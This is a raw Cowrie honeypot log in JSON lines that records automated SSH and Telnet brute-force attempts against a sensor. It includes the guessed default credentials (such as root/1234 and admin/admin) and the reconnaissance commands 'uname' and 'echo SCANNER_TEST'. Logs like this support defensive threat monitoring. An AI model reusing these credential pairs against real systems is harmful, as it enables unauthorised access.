{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:32:52.626742Z","src_ip":"212.227.125.160","session":"47961f646b0b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55300,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f7b6f9762e2","protocol":"ssh","message":"New connection: 212.227.235.229:55300 (1.2.3.4:22) [session: 9f7b6f9762e2]","sensor":"my-vps","timestamp":"2025-08-31T03:32:54.295558Z"}
{"eventid":"cowrie.session.closed","duration":"79.9","message":"Connection lost after 79.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:32:54.651972Z","src_ip":"212.227.235.229","session":"7ed4f9da8028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55146,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4bbef95f8f1","protocol":"ssh","message":"New connection: 212.227.235.229:55146 (1.2.3.4:22) [session: d4bbef95f8f1]","sensor":"my-vps","timestamp":"2025-08-31T03:33:00.979817Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:33:02.003623Z","src_ip":"212.227.235.229","session":"d4bbef95f8f1"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:33:02.004459Z","src_ip":"212.227.235.229","session":"d4bbef95f8f1"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50728,"dst_ip":"1.2.3.4","dst_port":22,"session":"11004368ce28","protocol":"ssh","message":"New connection: 41.226.27.251:50728 (1.2.3.4:22) [session: 11004368ce28]","sensor":"my-vps","timestamp":"2025-08-31T03:33:03.082731Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:33:03.128138Z","src_ip":"41.226.27.251","session":"11004368ce28"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:33:03.130008Z","src_ip":"41.226.27.251","session":"11004368ce28"}
{"eventid":"cowrie.login.failed","username":"www","password":"www123","message":"login attempt [www/www123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:03.306121Z","src_ip":"41.226.27.251","session":"11004368ce28"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:04.502854Z","src_ip":"41.226.27.251","session":"11004368ce28"}
{"eventid":"cowrie.login.failed","username":"guest","password":"welcome","message":"login attempt [guest/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:07.066428Z","src_ip":"212.227.235.229","session":"d4bbef95f8f1"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:08.958916Z","src_ip":"212.227.235.229","session":"d4bbef95f8f1"}
{"eventid":"cowrie.session.closed","duration":"27.5","message":"Connection lost after 27.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:21.841416Z","src_ip":"212.227.235.229","session":"9f7b6f9762e2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":45082,"dst_ip":"1.2.3.4","dst_port":22,"session":"e703004875bf","protocol":"ssh","message":"New connection: 212.227.125.160:45082 (1.2.3.4:22) [session: e703004875bf]","sensor":"my-vps","timestamp":"2025-08-31T03:33:22.197797Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:33:22.625147Z","src_ip":"212.227.125.160","session":"e703004875bf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:33:22.625889Z","src_ip":"212.227.125.160","session":"e703004875bf"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":56154,"dst_ip":"1.2.3.4","dst_port":22,"session":"43538c283b12","protocol":"ssh","message":"New connection: 41.226.27.251:56154 (1.2.3.4:22) [session: 43538c283b12]","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.100175Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.118388Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.163758Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.login.success","username":"root","password":"Ac123456","message":"login attempt [root/Ac123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.312677Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:33:23.420036Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.420766Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.464557Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:23.465631Z","src_ip":"41.226.27.251","session":"43538c283b12"}
{"eventid":"cowrie.login.failed","username":"guest","password":"welcome","message":"login attempt [guest/welcome] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:24.816495Z","src_ip":"212.227.125.160","session":"e703004875bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57062,"dst_ip":"1.2.3.4","dst_port":23,"session":"13cdb3ccf96c","protocol":"telnet","message":"New connection: 212.227.235.229:57062 (1.2.3.4:23) [session: 13cdb3ccf96c]","sensor":"my-vps","timestamp":"2025-08-31T03:33:25.614110Z"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:26.300923Z","src_ip":"212.227.125.160","session":"e703004875bf"}
{"eventid":"cowrie.session.closed","duration":4.371917009353638,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:29.985956Z","src_ip":"212.227.235.229","session":"13cdb3ccf96c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45076,"dst_ip":"1.2.3.4","dst_port":23,"session":"03a5357c93f3","protocol":"telnet","message":"New connection: 212.227.235.229:45076 (1.2.3.4:23) [session: 03a5357c93f3]","sensor":"my-vps","timestamp":"2025-08-31T03:33:30.221095Z"}
{"eventid":"cowrie.session.closed","duration":1.4859199523925781,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:31.706944Z","src_ip":"212.227.235.229","session":"03a5357c93f3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45088,"dst_ip":"1.2.3.4","dst_port":23,"session":"d5f142a94d38","protocol":"telnet","message":"New connection: 212.227.235.229:45088 (1.2.3.4:23) [session: d5f142a94d38]","sensor":"my-vps","timestamp":"2025-08-31T03:33:31.927094Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:32.468074Z","src_ip":"212.227.235.229","session":"d5f142a94d38"}
{"eventid":"cowrie.login.failed","username":"","password":"","message":"login attempt [/] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:34.080961Z","src_ip":"212.227.235.229","session":"d5f142a94d38"}
{"eventid":"cowrie.login.failed","username":"test","password":"abc123","message":"login attempt [test/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:34.611541Z","src_ip":"212.227.125.160","session":"47961f646b0b"}
{"eventid":"cowrie.session.closed","duration":2.963259220123291,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:34.890286Z","src_ip":"212.227.235.229","session":"d5f142a94d38"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45104,"dst_ip":"1.2.3.4","dst_port":23,"session":"00440345b07c","protocol":"telnet","message":"New connection: 212.227.235.229:45104 (1.2.3.4:23) [session: 00440345b07c]","sensor":"my-vps","timestamp":"2025-08-31T03:33:35.109020Z"}
{"eventid":"cowrie.session.closed","duration":1.5558254718780518,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:36.664750Z","src_ip":"212.227.235.229","session":"00440345b07c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45114,"dst_ip":"1.2.3.4","dst_port":23,"session":"5b64817a7f72","protocol":"telnet","message":"New connection: 212.227.235.229:45114 (1.2.3.4:23) [session: 5b64817a7f72]","sensor":"my-vps","timestamp":"2025-08-31T03:33:36.888890Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"VnT3ch@dm1n","message":"login attempt [admin/VnT3ch@dm1n] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:37.579240Z","src_ip":"212.227.235.229","session":"5b64817a7f72"}
{"eventid":"cowrie.session.closed","duration":2.7659502029418945,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:39.654770Z","src_ip":"212.227.235.229","session":"5b64817a7f72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51424,"dst_ip":"1.2.3.4","dst_port":23,"session":"02bcf2378f68","protocol":"telnet","message":"New connection: 212.227.235.229:51424 (1.2.3.4:23) [session: 02bcf2378f68]","sensor":"my-vps","timestamp":"2025-08-31T03:33:39.881803Z"}
{"eventid":"cowrie.session.closed","duration":"60.8","message":"Connection lost after 60.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:40.748802Z","src_ip":"212.227.125.160","session":"47961f646b0b"}
{"eventid":"cowrie.session.closed","duration":1.677372694015503,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:41.559112Z","src_ip":"212.227.235.229","session":"02bcf2378f68"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51434,"dst_ip":"1.2.3.4","dst_port":23,"session":"ee22871c5945","protocol":"telnet","message":"New connection: 212.227.235.229:51434 (1.2.3.4:23) [session: ee22871c5945]","sensor":"my-vps","timestamp":"2025-08-31T03:33:41.780317Z"}
{"eventid":"cowrie.session.closed","duration":1.7099251747131348,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.490173Z","src_ip":"212.227.235.229","session":"ee22871c5945"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":45032,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc6f0eae4c15","protocol":"ssh","message":"New connection: 41.226.27.251:45032 (1.2.3.4:22) [session: cc6f0eae4c15]","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.545343Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.658714Z","src_ip":"41.226.27.251","session":"cc6f0eae4c15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.659664Z","src_ip":"41.226.27.251","session":"cc6f0eae4c15"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51468,"dst_ip":"1.2.3.4","dst_port":23,"session":"21c63ba59163","protocol":"telnet","message":"New connection: 212.227.235.229:51468 (1.2.3.4:23) [session: 21c63ba59163]","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.708063Z"}
{"eventid":"cowrie.login.failed","username":"nexus","password":"nexus","message":"login attempt [nexus/nexus] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:43.842012Z","src_ip":"41.226.27.251","session":"cc6f0eae4c15"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:45.145882Z","src_ip":"41.226.27.251","session":"cc6f0eae4c15"}
{"eventid":"cowrie.session.closed","duration":1.8202929496765137,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:45.528284Z","src_ip":"212.227.235.229","session":"21c63ba59163"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51502,"dst_ip":"1.2.3.4","dst_port":23,"session":"edc1cc884d2b","protocol":"telnet","message":"New connection: 212.227.235.229:51502 (1.2.3.4:23) [session: edc1cc884d2b]","sensor":"my-vps","timestamp":"2025-08-31T03:33:45.746960Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"","message":"login attempt [admin/] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:47.668292Z","src_ip":"212.227.235.229","session":"edc1cc884d2b"}
{"eventid":"cowrie.session.closed","duration":5.0913472175598145,"message":"Connection lost after 5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:50.838240Z","src_ip":"212.227.235.229","session":"edc1cc884d2b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40286,"dst_ip":"1.2.3.4","dst_port":23,"session":"8b3b822ed39b","protocol":"telnet","message":"New connection: 212.227.235.229:40286 (1.2.3.4:23) [session: 8b3b822ed39b]","sensor":"my-vps","timestamp":"2025-08-31T03:33:51.066327Z"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:51.672148Z","src_ip":"212.227.235.229","session":"8b3b822ed39b"}
{"eventid":"cowrie.session.closed","duration":2.7538208961486816,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:53.820070Z","src_ip":"212.227.235.229","session":"8b3b822ed39b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40296,"dst_ip":"1.2.3.4","dst_port":23,"session":"c80f8704b869","protocol":"telnet","message":"New connection: 212.227.235.229:40296 (1.2.3.4:23) [session: c80f8704b869]","sensor":"my-vps","timestamp":"2025-08-31T03:33:54.033128Z"}
{"eventid":"cowrie.login.failed","username":"admin","password":"1234","message":"login attempt [admin/1234] failed","sensor":"my-vps","timestamp":"2025-08-31T03:33:54.634515Z","src_ip":"212.227.235.229","session":"c80f8704b869"}
{"eventid":"cowrie.session.closed","duration":2.6972568035125732,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:33:56.730308Z","src_ip":"212.227.235.229","session":"c80f8704b869"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":40306,"dst_ip":"1.2.3.4","dst_port":23,"session":"2c9910a0e2a6","protocol":"telnet","message":"New connection: 212.227.235.229:40306 (1.2.3.4:23) [session: 2c9910a0e2a6]","sensor":"my-vps","timestamp":"2025-08-31T03:33:56.945732Z"}
{"eventid":"cowrie.login.success","username":"root","password":"1234","message":"login attempt [root/1234] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:33:58.786633Z","src_ip":"212.227.235.229","session":"2c9910a0e2a6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:33:58.805781Z","src_ip":"212.227.235.229","session":"2c9910a0e2a6"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-31T03:33:59.037092Z","src_ip":"212.227.235.229","session":"2c9910a0e2a6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35030,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0af2260a036","protocol":"ssh","message":"New connection: 212.227.235.229:35030 (1.2.3.4:22) [session: c0af2260a036]","sensor":"my-vps","timestamp":"2025-08-31T03:33:59.339654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.052146Z","src_ip":"212.227.235.229","session":"c0af2260a036"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:34:00.052851Z","src_ip":"212.227.235.229","session":"c0af2260a036"}
